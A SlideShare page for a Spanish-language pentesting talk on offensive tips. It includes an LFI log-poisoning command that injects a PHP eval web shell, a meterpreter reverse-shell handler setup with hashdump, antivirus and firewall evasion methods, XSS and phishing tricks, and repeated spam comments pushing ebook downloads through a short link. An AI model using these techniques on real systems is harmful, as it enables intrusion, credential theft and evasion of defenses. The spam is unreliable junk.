Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
HACKING LIKE A BOSS
TIPS Y TRUCOS PARA HACKEAR
Roberto Salgado
• Co-founder of Websec
• Provide information security solutions
• Pen-testing, training and monitoring
• P...
TEMARIO
• DVWA
• Herramientas para el browser
• Buscar otras entradas de ataque
• Encontrar vulns con auditoria de código
...
PENTEST VS AUDITORIA DE
VULNERABILIDADES
• En la auditoría de vulnerabilidades se listan todas las
vulnerabilidades encont...
DAMN VULNERABLE WEB APPLICATION
DVWA es una aplicación web vulnerable a:
• Brute Force
• Command Execution
• Insecure Capt...
LOCAL FILE INCLUSION
• LFI es una vulnerabilidad que nos permite leer archivos en un
sistema
• DEMO - http://localhost/lfi...
LOCAL FILE INCLUSION
Preferimos RCE:
• access.log
• error.log
• /proc/self/environ
• /proc/self/status
• /proc/{id}/fd/2
•...
LOCAL FILE INCLUSION
curl "http://site.com/index.php?page=
../../../../../../../../proc/self/fd/2&cmd=phpinfo();“
-H "User...
LOCAL FILE INCLUSION
• RCE No es posible?
• En ese caso tenemos que buscar archivos confidenciales
manualmente
• Buscar ar...
HERRAMIENTAS
TOOLS / LFI / PANOPTIC
• Filtrar búsqueda por Sistema Operativo, tipo de archivo (conf o
log), software, etc…
• Opción par...
TOOLS / LFI / PANOPTIC
• https://github.com/lightos/Panoptic
• git clone https://github.com/lightos/Panoptic.git
• https:/...
TOOLS / PROXY / FIREFOX
• Tamper Data
• Hack Bar
• Burp Suite Pro
TOOLS / PROXY / FIREFOX
• Tamper Data --- DEMO
• Hack Bar --- DEMO
• Burp Suite Pro
TOOLS / PROXY / CHROME
• Chrome Developer Tools (Ctrl+Shift+I o F12)
• API limitado == No hay equivalente a tamper data
• ...
TOOLS / BURPSUITE PRO
• http://portswigger.net/burp/download.html
TOOLS / BURPSUITE PRO
• Spider / Crawler
• Live + Escáner Pasivo
• Repeater
• Intruder
DEMO
TOOLS / FUZZDB
• FUZZDB – Lista de cadenas (strings) para fuzzear
• https://code.google.com/p/fuzzdb/
TOOLS / FUZZDB
svn checkout http://fuzzdb.googlecode.com/svn/trunk/
fuzzdb-read-only
REVERSE IP LOOKUP
• No encontramos vulnerabilidades/entrada en una pagina
• Hosting compartido?
REVERSE IP LOOKUP
• http://www.ip2hosts.com/
REVERSE IP LOOKUP
• App de Android
• https://play.google.com/store/apps/details?id=websec.ip2hosts
&hl=es
DEMO
DNS LOOKUP
• Ataque de diccionario
• Ataque de fuerza bruta (brute force)
• Transferencia de zona
• SOA (Start of Authorit...
DNS LOOKUP
• Fierce - RSnake
• DNSMap - GNUCitizen
• DNS_enum – MSF
• DNS-Discovery
• DNSRecon
• DNSRecord
• DnsWalk
GOOGLE HACKING
• Enfocar la búsqueda a nuestra victima
• site: nuestro-objetivo.com.com.mx
• Encontrar archivos, logins, d...
ADMIN FINDER
• Como encontrar la pagina de admin?
• Google dork: admin finder
• Admin finder: ataque de diccionario
BUSCANDO VULNS
EN
AUDITORIA DE
CÓDIGO
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Nu...
DEMO
PHISHING
URL SPOOFING
• Pedro Joaquín mostró esta técnica
• <a href="https://www.google.com/"
onmousedown="this.href='http://websec...
DEMO
ATAQUES CON UNICODE
• Continuación del rango ASCII
• Left-To-Right Override
• +U202D
• Right-To-Left Override
• +U202E
LIVE DEMO
PHISHING / TLD INCORRECTO
• Registran .com.mx pero no .com
• .net, .org, .co, .ca, .mx
• www.campus-party.com.mx - Existe
...
DOMAIN SQUATTING / BIT SQUATTING
• Rayos cósmicos
• Se sobrecalienta el dispositivo
• Pasa unas 600,000 veces al día
Herra...
MSF AUTOPWNAGE
• Captura de pantalla (screenshot)
• Foto de la Webcam (webcam_snap)
• Información del sistema (sysinfo)
• ...
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession f...
LIVE DEMO
LIVE DEMO
EN UN MOMENTO…
EVASION DE AV
EVASIÓN DE ANTIVIRUS
• Dsplit
• Crypters publicos
• XOR Crypter
EVASIÓN DE ANTIVIRUS / DSPLIT
• Incrementalmente dividimos el archivo en bytes
• Escaneamos cada archivo generado
• Volvem...
EVASIÓN DE ANTIVIRUS / CRYPTER PUBLICO
• http://foro.udtools.net
EVASIÓN DE ANTIVIRUS / CRYPTER XOR
• Herramienta en Python que usa en template en C
• Hace XOR con un random byte y le agr...
LIVE DEMO
EVASION DE FIREWALL
• HTML 5 Security CheatSheet
• http://html5sec.org
• Base de Conocimientos de Inyecciones SQL
• http:/...
EVASION DE FIREWALL
EVASION DE FIREWALL
Meterpreter:
• Usar un reverse TCP
• Usar puertos permitidos: 53, 80, 443
EVASION DE FIREWALL
• URL Original:
• index.php?id=1
• URL Modificado:
• index.php?id%00 AQUÍ PODEMOS PONER LO QUE QUERAMO...
SQLMAP TAMPER SCRIPTS
• percentage.py
• space2hash.py
• space2dash.py
• space2morehash.py
• space2mssqlhash.py
• space2mys...
FIN
@LIGHTOS
RSALGADO@WEBSEC.MX
HTTP://WWW.WEBSEC.MX
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
Upcoming SlideShare
Loading in …5
×

CPMX5 - Hacking like a boss por Roberto Salgado

1,328 views

Published on

A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema

Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.

Published in: Technology
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

CPMX5 - Hacking like a boss por Roberto Salgado

  1. 1. HACKING LIKE A BOSS TIPS Y TRUCOS PARA HACKEAR
  2. 2. Roberto Salgado • Co-founder of Websec • Provide information security solutions • Pen-testing, training and monitoring • Pythonista / Security Researcher Contacto • rsalgado@websec.mx • http://www.websec.mx • http://www.twitter.com/@LightOS • http://www.github.com/lightos
  3. 3. TEMARIO • DVWA • Herramientas para el browser • Buscar otras entradas de ataque • Encontrar vulns con auditoria de código • Phishing • Evasión de AV • Evasión de Firewall
  4. 4. PENTEST VS AUDITORIA DE VULNERABILIDADES • En la auditoría de vulnerabilidades se listan todas las vulnerabilidades encontradas. • En la prueba de penetración solo se listan las vulnerabilidades que se utilizaron para obtener acceso a la información, haciendo énfasis en el impacto de la explotación y no en la totalidad de las vulnerabilidades.
  5. 5. DAMN VULNERABLE WEB APPLICATION DVWA es una aplicación web vulnerable a: • Brute Force • Command Execution • Insecure Captcha • File Inclusion • SQLi • SQLi Blind • Upload • XSS Reflected • XSS Stored
  6. 6. LOCAL FILE INCLUSION • LFI es una vulnerabilidad que nos permite leer archivos en un sistema • DEMO - http://localhost/lfi.php?file
  7. 7. LOCAL FILE INCLUSION Preferimos RCE: • access.log • error.log • /proc/self/environ • /proc/self/status • /proc/{id}/fd/2 • /proc/self/fd/2 • /var/spool/mail
  8. 8. LOCAL FILE INCLUSION curl "http://site.com/index.php?page= ../../../../../../../../proc/self/fd/2&cmd=phpinfo();“ -H "User-Agent: <?php eval($_GET[cmd]); ?>"
  9. 9. LOCAL FILE INCLUSION • RCE No es posible? • En ese caso tenemos que buscar archivos confidenciales manualmente • Buscar archivos de configuración o bitácoras para elevar nuestro acceso
  10. 10. HERRAMIENTAS
  11. 11. TOOLS / LFI / PANOPTIC • Filtrar búsqueda por Sistema Operativo, tipo de archivo (conf o log), software, etc… • Opción para guardar los archivos encontrados y quitar el HTML del archivo • Soporta hilos, proxy HTML y socks 4/5, user-agent al azar, etc…
  12. 12. TOOLS / LFI / PANOPTIC • https://github.com/lightos/Panoptic • git clone https://github.com/lightos/Panoptic.git • https://github.com/lightos/Panoptic/archive/master.zip
  13. 13. TOOLS / PROXY / FIREFOX • Tamper Data • Hack Bar • Burp Suite Pro
  14. 14. TOOLS / PROXY / FIREFOX • Tamper Data --- DEMO • Hack Bar --- DEMO • Burp Suite Pro
  15. 15. TOOLS / PROXY / CHROME • Chrome Developer Tools (Ctrl+Shift+I o F12) • API limitado == No hay equivalente a tamper data • Burp Suite Pro al rescate!
  16. 16. TOOLS / BURPSUITE PRO • http://portswigger.net/burp/download.html
  17. 17. TOOLS / BURPSUITE PRO • Spider / Crawler • Live + Escáner Pasivo • Repeater • Intruder
  18. 18. DEMO
  19. 19. TOOLS / FUZZDB • FUZZDB – Lista de cadenas (strings) para fuzzear • https://code.google.com/p/fuzzdb/
  20. 20. TOOLS / FUZZDB svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
  21. 21. REVERSE IP LOOKUP • No encontramos vulnerabilidades/entrada en una pagina • Hosting compartido?
  22. 22. REVERSE IP LOOKUP • http://www.ip2hosts.com/
  23. 23. REVERSE IP LOOKUP • App de Android • https://play.google.com/store/apps/details?id=websec.ip2hosts &hl=es
  24. 24. DEMO
  25. 25. DNS LOOKUP • Ataque de diccionario • Ataque de fuerza bruta (brute force) • Transferencia de zona • SOA (Start of Authority) a través de DNS mal configurado
  26. 26. DNS LOOKUP • Fierce - RSnake • DNSMap - GNUCitizen • DNS_enum – MSF • DNS-Discovery • DNSRecon • DNSRecord • DnsWalk
  27. 27. GOOGLE HACKING • Enfocar la búsqueda a nuestra victima • site: nuestro-objetivo.com.com.mx • Encontrar archivos, logins, dominios adicionales • Demo
  28. 28. ADMIN FINDER • Como encontrar la pagina de admin? • Google dork: admin finder • Admin finder: ataque de diccionario
  29. 29. BUSCANDO VULNS EN AUDITORIA DE CÓDIGO
  30. 30. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
  31. 31. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo
  32. 32. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo
  33. 33. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea
  34. 34. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea
  35. 35. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea • Dos líneas atrás
  36. 36. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea • Dos líneas atrás • Dos líneas adelante
  37. 37. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea • Dos líneas atrás • Dos líneas adelante • Mayúsculas y minúsculas
  38. 38. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea • Dos líneas atrás • Dos líneas adelante • Mayúsculas y minúsculas • Buscar GET o POST
  39. 39. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea • Dos líneas atrás • Dos líneas adelante • Mayúsculas y minúsculas • Buscar GET o POST • En el directorio actual
  40. 40. BUSCANDO VULNS EN PUT IZ A grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt • Recursivo • Nombre de archivo • Numero de línea • Dos líneas atrás • Dos líneas adelante • Mayúsculas y minúsculas • Buscar GET o POST • En el directorio actual • Guardar los resultados a vulns.txt
  41. 41. DEMO
  42. 42. PHISHING
  43. 43. URL SPOOFING • Pedro Joaquín mostró esta técnica • <a href="https://www.google.com/" onmousedown="this.href='http://websec.mx'">https://www.g oogle.com/</a>
  44. 44. DEMO
  45. 45. ATAQUES CON UNICODE • Continuación del rango ASCII • Left-To-Right Override • +U202D • Right-To-Left Override • +U202E
  46. 46. LIVE DEMO
  47. 47. PHISHING / TLD INCORRECTO • Registran .com.mx pero no .com • .net, .org, .co, .ca, .mx • www.campus-party.com.mx - Existe • www.campus-party.net – No existe • www.campus-party.com – En venta
  48. 48. DOMAIN SQUATTING / BIT SQUATTING • Rayos cósmicos • Se sobrecalienta el dispositivo • Pasa unas 600,000 veces al día Herramienta: • URLCRAZY
  49. 49. MSF AUTOPWNAGE • Captura de pantalla (screenshot) • Foto de la Webcam (webcam_snap) • Información del sistema (sysinfo) • Obtención de la IP (ipconfig) • Routing de la red (route) • Carpeta actual (pwd) • Listar archivos (ls) • Dumpear claves (run hashdump) • Cierra la sesión
  50. 50. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 set ExitOnSession false spool C:UsersLightOSDesktopmsf-output.log exploit -j
  51. 51. LIVE DEMO
  52. 52. LIVE DEMO EN UN MOMENTO…
  53. 53. EVASION DE AV
  54. 54. EVASIÓN DE ANTIVIRUS • Dsplit • Crypters publicos • XOR Crypter
  55. 55. EVASIÓN DE ANTIVIRUS / DSPLIT • Incrementalmente dividimos el archivo en bytes • Escaneamos cada archivo generado • Volvemos a dividir el archivo que es detectado y uno después • Repetimos el proceso hasta que nos quede 1 byte de diferencia • Modificamos el byte para cambiar la firma y evadir detección
  56. 56. EVASIÓN DE ANTIVIRUS / CRYPTER PUBLICO • http://foro.udtools.net
  57. 57. EVASIÓN DE ANTIVIRUS / CRYPTER XOR • Herramienta en Python que usa en template en C • Hace XOR con un random byte y le agrega padding para cambiar el tamaño • Carga el shellcode y hace la operación XOR al correr
  58. 58. LIVE DEMO
  59. 59. EVASION DE FIREWALL • HTML 5 Security CheatSheet • http://html5sec.org • Base de Conocimientos de Inyecciones SQL • http://www.websec.ca/kb/sql_injection
  60. 60. EVASION DE FIREWALL
  61. 61. EVASION DE FIREWALL Meterpreter: • Usar un reverse TCP • Usar puertos permitidos: 53, 80, 443
  62. 62. EVASION DE FIREWALL • URL Original: • index.php?id=1 • URL Modificado: • index.php?id%00 AQUÍ PODEMOS PONER LO QUE QUERAMOS=1 • Probar Bypasses: • Index.php?id%00”><script>alert(0)</script>=1
  63. 63. SQLMAP TAMPER SCRIPTS • percentage.py • space2hash.py • space2dash.py • space2morehash.py • space2mssqlhash.py • space2mysqldash.py • space2mssqlblank.py • charencode.py • charunicodeencode.py • chardoubleencode.py
  64. 64. FIN @LIGHTOS RSALGADO@WEBSEC.MX HTTP://WWW.WEBSEC.MX

×